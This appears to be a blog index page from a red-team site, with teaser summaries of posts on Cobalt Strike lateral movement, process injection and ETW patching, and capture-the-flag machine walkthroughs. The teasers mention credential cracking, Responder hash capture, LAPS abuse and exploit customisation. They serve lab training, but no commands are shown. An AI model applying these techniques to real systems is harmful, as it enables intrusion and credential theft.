Home

In this short blog, we revisit the realm of Cobalt Strike and explore the somewhat undocumented advantages of utilizing HTTP(S) listeners during lateral movement over typical or traditional approaches involving SMB pipe and reverse TCPs listeners. We’ll also learn how to use HTTP listeners instead of SMB/TCP for simulated red teaming operations....

Beginner-friendly blog explaining BOFs and writing custom process injector and remote Etw patching.

Perspective Perspective machine on HackTheBox, submitted by w1nd3x. The machines start from a web server, running IIS. Eventually, it led to admin panel hijacking, using misconfiguration in forget password functionality. We exploit insecure upload functionality, leading us to get the web config and XXS. Later we get all the important fields to e...

Timelapse Timelapes is a 20 points machine on Hackthebox; submitted by d4rkpayl0ad. We get an initial foothold by cracking a certificate’s password and using it to get a Winrm session. For root we run, Bloodhound, we found a group named LAPS_READERS that can read laps password. We found that user svc_deploy is a member of that group. We escalate...

Acute: Acute is 40 points machine submitted and created by dmw0ng. The creator rated the box hard, and the community score matches with the box. The machine starts from an HTTPS web server and a few OSINT stuff. After the initial foothold, we find a scheduled tasks running, and eventually, it leads to new credentials, a new powershell session on...

Set Set is a 90 points machine on TryHackMe developed and created by 4nqr34z and Omarbdrn. The Initial Foothold is about finding usernames and password spraying; later, we grab the NTLMv2 hash using responder, crack it, and get a Winrm session. For root, we exploit Veeam One Agent Service, by customizing Metasploit’s exploit. Later in the walk...